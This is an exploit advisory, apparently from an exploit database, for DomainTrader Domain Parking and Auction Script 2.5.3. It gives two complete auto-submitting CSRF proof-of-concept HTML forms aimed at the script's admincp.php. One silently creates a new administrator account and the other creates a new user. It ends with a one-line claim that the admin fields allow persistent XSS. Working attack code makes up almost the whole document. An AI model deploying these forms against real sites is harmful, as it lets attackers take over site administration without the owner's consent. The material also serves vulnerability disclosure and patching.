DomainTrader Domain Parking / Auction Script 2.5.3 CSRF / XSS



EKU-ID: 4218 CVE: OSVDB-ID:
Author: Haider Mahmood Published: 2014-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities
# Google Dork: Find yourself xD
# Date: 26/8/2014
# Exploit Author: Haider Mahmood | @HaiderMQ
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/
# Version: Tested on Latest Version 2.5.3

Add new administrator CSRF:


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
    window.document.forms[0].submit();
  });
</script>
 <form name="add_admin" id="add_admin" method="post" action="victim.com/admin/admincp.php">
    <input type="hidden" name="mode" value="addadminuser" />
      <table width="400" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td>Username:</td>
          <td><input name="username" type="text" value="USERNAME" /></td>
        </tr>
        <tr>
          <td>Email Address:</td>
          <td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td>
        </tr>
        <tr>
          <td>Password:</td>
          <td><input name="password" type="text" value="DESIRED_PASSWORD" /></td>
        </tr>
        <tr>
          <td><input name="submit" type="submit" value="Add User" /></td>
          <td>&nbsp;</td>
        </tr>
      </table>
    </form>


Add new user CSRF:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
    window.document.forms[0].submit();
  });
</script>
<form name="add_user" id="add_user" method="post" action="victim.com/admin/admincp.php">
    <input type="hidden" name="mode" value="addnewuser">
      <table width="500" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td><span>Username:</span></td>
            <td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td>
          </tr>
          <tr>
            <td><span>Password:</span></td>
            <td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td>
          </tr>
          <tr>
            <td><span>Confirm Password:</span></td>
            <td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td>
          </tr>
          <tr>
            <td width="200"><span>First Name:</span></td>
            <td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td>
          </tr>
          <tr>
            <td><span>Last Name:</span></td>
            <td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td>
          </tr>
          <tr>
            <td><span>Email Address:</span></td>
            <td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td>
          </tr>
          <tr>
            <td><span>Telephone:</span></td>
            <td><input type="text" name="telephone" id="telephone" value="010101010"></td>
          </tr>
          <tr>
            <td><span>Street Address:</span></td>
            <td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>City:</span></td>
            <td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>County/State:</span></td>
            <td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>Postcode/Zipcode:</span></td>
            <td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>Country:</span></td>
            <td>
              <select name="country" id="country">
                                                  <option value="AFGHANISTAN">AFGHANISTAN</option>
                                                                  <option value="ALBANIA">ALBANIA</option>
                                                                  <option value="ALGERIA">ALGERIA</option>
                                                                  <option value="AMERICAN SAMOA">AMERICAN SAMOA</option>
                                                                  <option value="ANDORRA">ANDORRA</option>
                                                                  <option value="ANGOLA">ANGOLA</option>
                                                                  <option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option>
                                                                  <option value="ARGENTINA">ARGENTINA</option>
                                                                  <option value="ARMENIA">ARMENIA</option>
                                                                  <option value="ARUBA">ARUBA</option>
                                                                  <option value="AUSTRALIA">AUSTRALIA</option>
                                                                  <option value="AUSTRIA">AUSTRIA</option>
                                                                  <option value="AZERBAIJAN">AZERBAIJAN</option>
                                                                  <option value="BAHAMAS">BAHAMAS</option>
                                                                  <option value="BAHRAIN">BAHRAIN</option>
                                                                  <option value="BANGLADESH">BANGLADESH</option>
                                                                  <option value="BARBADOS">BARBADOS</option>
                                                                  <option value="BELARUS">BELARUS</option>
                                                                  <option value="BELGIUM">BELGIUM</option>
                                                                  <option value="BELIZE">BELIZE</option>
                                                                  <option value="BENIN">BENIN</option>
                                                                  <option value="BERMUDA">BERMUDA</option>
                                                                  <option value="BHUTAN">BHUTAN</option>
                                                                  <option value="BOLIVIA">BOLIVIA</option>
                                                                  <option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option>
                                                                  <option value="BOTSWANA">BOTSWANA</option>
                                                                  <option value="BRAZIL">BRAZIL</option>
                                                                  <option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option>
                                                                  <option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option>
                                                                  <option value="BULGARIA">BULGARIA</option>
                                                                  <option value="BURKINA FASO">BURKINA FASO</option>
                                                                  <option value="BURUNDI">BURUNDI</option>
                                                                  <option value="CAMBODIA">CAMBODIA</option>
                                                                  <option value="CAMEROON">CAMEROON</option>
                                                                  <option value="CANADA">CANADA</option>
                                                                  <option value="CAPE VERDE">CAPE VERDE</option>
                                                                  <option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option>
                                                                  <option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option>
                                                                  <option value="CHAD">CHAD</option>
                                                                  <option value="CHILE">CHILE</option>
                                                                  <option value="CHINA">CHINA</option>
                                                                  <option value="COLOMBIA">COLOMBIA</option>
                                                                  <option value="COMOROS">COMOROS</option>
                                                                  <option value="CONGO">CONGO</option>
                                                                  <option value="COOK ISLANDS">COOK ISLANDS</option>
                                                                  <option value="COSTA RICA">COSTA RICA</option>
                                                                  <option value="COTE D'IVOIRE">COTE D'IVOIRE</option>
                                                                  <option value="CROATIA">CROATIA</option>
                                                                  <option value="CUBA">CUBA</option>
                                                                  <option value="CYPRUS">CYPRUS</option>
                                                                  <option value="CZECH REPUBLIC">CZECH REPUBLIC</option>
                                                                  <option value="DENMARK">DENMARK</option>
                                                                  <option value="DJIBOUTI">DJIBOUTI</option>
                                                                  <option value="DOMINICA">DOMINICA</option>
                                                                  <option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option>
                                                                  <option value="ECUADOR">ECUADOR</option>
                                                                  <option value="EGYPT">EGYPT</option>
                                                                  <option value="EL SALVADOR">EL SALVADOR</option>
                                                                  <option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option>
                                                                  <option value="ERITREA">ERITREA</option>
                                                                  <option value="ESTONIA">ESTONIA</option>
                                                                  <option value="ETHIOPIA">ETHIOPIA</option>
                                                                  <option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option>
                                                                  <option value="FAROE ISLANDS">FAROE ISLANDS</option>
                                                                  <option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option>
                                                                  <option value="FIJI">FIJI</option>
                                                                  <option value="FINLAND">FINLAND</option>
                                                                  <option value="FRANCE">FRANCE</option>
                                                                  <option value="FRENCH GUIANA">FRENCH GUIANA</option>
                                                                  <option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option>
                                                                  <option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option>
                                                                  <option value="GABON">GABON</option>
                                                                  <option value="GAMBIA">GAMBIA</option>
                                                                  <option value="GEORGIA">GEORGIA</option>
                                                                  <option value="GERMANY">GERMANY</option>
                                                                  <option value="GHANA">GHANA</option>
                                                                  <option value="GIBRALTAR">GIBRALTAR</option>
                                                                  <option value="GREECE">GREECE</option>
                                                                  <option value="GREENLAND">GREENLAND</option>
                                                                  <option value="GRENADA">GRENADA</option>
                                                                  <option value="GUADELOUPE">GUADELOUPE</option>
                                                                  <option value="GUAM">GUAM</option>
                                                                  <option value="GUATEMALA">GUATEMALA</option>
                                                                  <option value="GUINEA">GUINEA</option>
                                                                  <option value="GUINEA-BISSAU">GUINEA-BISSAU</option>
                                                                  <option value="GUYANA">GUYANA</option>
                                                                  <option value="HAITI">HAITI</option>
                                                                  <option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option>
                                                                  <option value="HONDURAS">HONDURAS</option>
                                                                  <option value="HONG KONG">HONG KONG</option>
                                                                  <option value="HUNGARY">HUNGARY</option>
                                                                  <option value="ICELAND">ICELAND</option>
                                                                  <option value="INDIA">INDIA</option>
                                                                  <option value="INDONESIA">INDONESIA</option>
                                                                  <option value="IRAQ">IRAQ</option>
                                                                  <option value="IRELAND">IRELAND</option>
                                                                  <option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option>
                                                                  <option value="ISRAEL">ISRAEL</option>
                                                                  <option value="ITALY">ITALY</option>
                                                                  <option value="JAMAICA">JAMAICA</option>
                                                                  <option value="JAPAN">JAPAN</option>
                                                                  <option value="JORDAN">JORDAN</option>
                                                                  <option value="KAZAKHSTAN">KAZAKHSTAN</option>
                                                                  <option value="KENYA">KENYA</option>
                                                                  <option value="KIRIBATI">KIRIBATI</option>
                                                                  <option value="KUWAIT">KUWAIT</option>
                                                                  <option value="KYRGYZSTAN">KYRGYZSTAN</option>
                                                                  <option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option>
                                                                  <option value="LATVIA">LATVIA</option>
                                                                  <option value="LEBANON">LEBANON</option>
                                                                  <option value="LESOTHO">LESOTHO</option>
                                                                  <option value="LIBERIA">LIBERIA</option>
                                                                  <option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option>
                                                                  <option value="LIECHTENSTEIN">LIECHTENSTEIN</option>
                                                                  <option value="LITHUANIA">LITHUANIA</option>
                                                                  <option value="LUXEMBOURG">LUXEMBOURG</option>
                                                                  <option value="MACAO">MACAO</option>
                                                                  <option value="MADAGASCAR">MADAGASCAR</option>
                                                                  <option value="MALAWI">MALAWI</option>
                                                                  <option value="MALAYSIA">MALAYSIA</option>
                                                                  <option value="MALDIVES">MALDIVES</option>
                                                                  <option value="MALI">MALI</option>
                                                                  <option value="MALTA">MALTA</option>
                                                                  <option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option>
                                                                  <option value="MARTINIQUE">MARTINIQUE</option>
                                                                  <option value="MAURITANIA">MAURITANIA</option>
                                                                  <option value="MAURITIUS">MAURITIUS</option>
                                                                  <option value="MEXICO">MEXICO</option>
                                                                  <option value="MONACO">MONACO</option>
                                                                  <option value="MONGOLIA">MONGOLIA</option>
                                                                  <option value="MOROCCO">MOROCCO</option>
                                                                  <option value="MOZAMBIQUE">MOZAMBIQUE</option>
                                                                  <option value="MYANMAR">MYANMAR</option>
                                                                  <option value="NAMIBIA">NAMIBIA</option>
                                                                  <option value="NAURU">NAURU</option>
                                                                  <option value="NEPAL">NEPAL</option>
                                                                  <option value="NETHERLANDS">NETHERLANDS</option>
                                                                  <option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option>
                                                                  <option value="NEW CALEDONIA">NEW CALEDONIA</option>
                                                                  <option value="NEW ZEALAND">NEW ZEALAND</option>
                                                                  <option value="NICARAGUA">NICARAGUA</option>
                                                                  <option value="NIGER">NIGER</option>
                                                                  <option value="NIGERIA">NIGERIA</option>
                                                                  <option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option>
                                                                  <option value="NORWAY">NORWAY</option>
                                                                  <option value="OMAN">OMAN</option>
                                                                  <option value="PAKISTAN">PAKISTAN</option>
                                                                  <option value="PALAU">PALAU</option>
                                                                  <option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option>
                                                                  <option value="PANAMA">PANAMA</option>
                                                                  <option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option>
                                                                  <option value="PARAGUAY">PARAGUAY</option>
                                                                  <option value="PERU">PERU</option>
                                                                  <option value="PHILIPPINES">PHILIPPINES</option>
                                                                  <option value="POLAND">POLAND</option>
                                                                  <option value="PORTUGAL">PORTUGAL</option>
                                                                  <option value="PUERTO RICO">PUERTO RICO</option>
                                                                  <option value="QATAR">QATAR</option>
                                                                  <option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option>
                                                                  <option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option>
                                                                  <option value="REUNION">REUNION</option>
                                                                  <option value="ROMANIA">ROMANIA</option>
                                                                  <option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option>
                                                                  <option value="RWANDA">RWANDA</option>
                                                                  <option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option>
                                                                  <option value="SAINT LUCIA">SAINT LUCIA</option>
                                                                  <option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option>
                                                                  <option value="SAMOA">SAMOA</option>
                                                                  <option value="SAN MARINO">SAN MARINO</option>
                                                                  <option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option>
                                                                  <option value="SAUDI ARABIA">SAUDI ARABIA</option>
                                                                  <option value="SENEGAL">SENEGAL</option>
                                                                  <option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option>
                                                                  <option value="SEYCHELLES">SEYCHELLES</option>
                                                                  <option value="SIERRA LEONE">SIERRA LEONE</option>
                                                                  <option value="SINGAPORE">SINGAPORE</option>
                                                                  <option value="SLOVAKIA">SLOVAKIA</option>
                                                                  <option value="SLOVENIA">SLOVENIA</option>
                                                                  <option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option>
                                                                  <option value="SOMALIA">SOMALIA</option>
                                                                  <option value="SOUTH AFRICA">SOUTH AFRICA</option>
                                                                  <option value="SPAIN">SPAIN</option>
                                                                  <option value="SRI LANKA">SRI LANKA</option>
                                                                  <option value="SUDAN">SUDAN</option>
                                                                  <option value="SURINAME">SURINAME</option>
                                                                  <option value="SWAZILAND">SWAZILAND</option>
                                                                  <option value="SWEDEN">SWEDEN</option>
                                                                  <option value="SWITZERLAND">SWITZERLAND</option>
                                                                  <option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option>
                                                                  <option value="TAIWAN">TAIWAN</option>
                                                                  <option value="TAJIKISTAN">TAJIKISTAN</option>
                                                                  <option value="THAILAND">THAILAND</option>
                                                                  <option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option>
                                                                  <option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option>
                                                                  <option value="TIMOR-LESTE">TIMOR-LESTE</option>
                                                                  <option value="TOGO">TOGO</option>
                                                                  <option value="TOKELAU">TOKELAU</option>
                                                                  <option value="TONGA">TONGA</option>
                                                                  <option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option>
                                                                  <option value="TUNISIA">TUNISIA</option>
                                                                  <option value="TURKEY">TURKEY</option>
                                                                  <option value="TURKMENISTAN">TURKMENISTAN</option>
                                                                  <option value="TUVALU">TUVALU</option>
                                                                  <option value="UGANDA">UGANDA</option>
                                                                  <option value="UKRAINE">UKRAINE</option>
                                                                  <option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option>
                                                                  <option value="UNITED KINGDOM">UNITED KINGDOM</option>
                                                                  <option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option>
                                                                  <option value="UNITED STATES">UNITED STATES</option>
                                                                  <option value="URUGUAY">URUGUAY</option>
                                                                  <option value="UZBEKISTAN">UZBEKISTAN</option>
                                                                  <option value="VANUATU">VANUATU</option>
                                                                  <option value="VENEZUELA">VENEZUELA</option>
                                                                  <option value="VIET NAM">VIET NAM</option>
                                                                  <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
                                                                  <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
                                                                  <option value="YEMEN">YEMEN</option>
                                                                  <option value="ZAMBIA">ZAMBIA</option>
                                                                  <option value="ZIMBABWE">ZIMBABWE</option>
                                              </select>
            </td>
          </tr>
          <tr>
            <td colspan="2"><input name="new_message_notify" type="checkbox" value="1"  /><span>Notify me by email when I receive a new message.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_received_notify" type="checkbox" value="1"  /><span>Notify me by email when I receive a new offer.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1"  /><span>Notify me when an offer I made is accepted.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1"  /><span>Notify me when an offer I made is cancelled</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1"  /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1"  /><span>Notify me by email when a domain is pushed.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1"  /><span>Notify me by email when a domain sale is complete.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input type="submit" name="Submit" value="Submit"></td>
          </tr>
        </table>
    </form>


XSS:

Add new Administrator values are not properly sanitized, neither on inserting into the database or selecting from the database causing Persistent XSS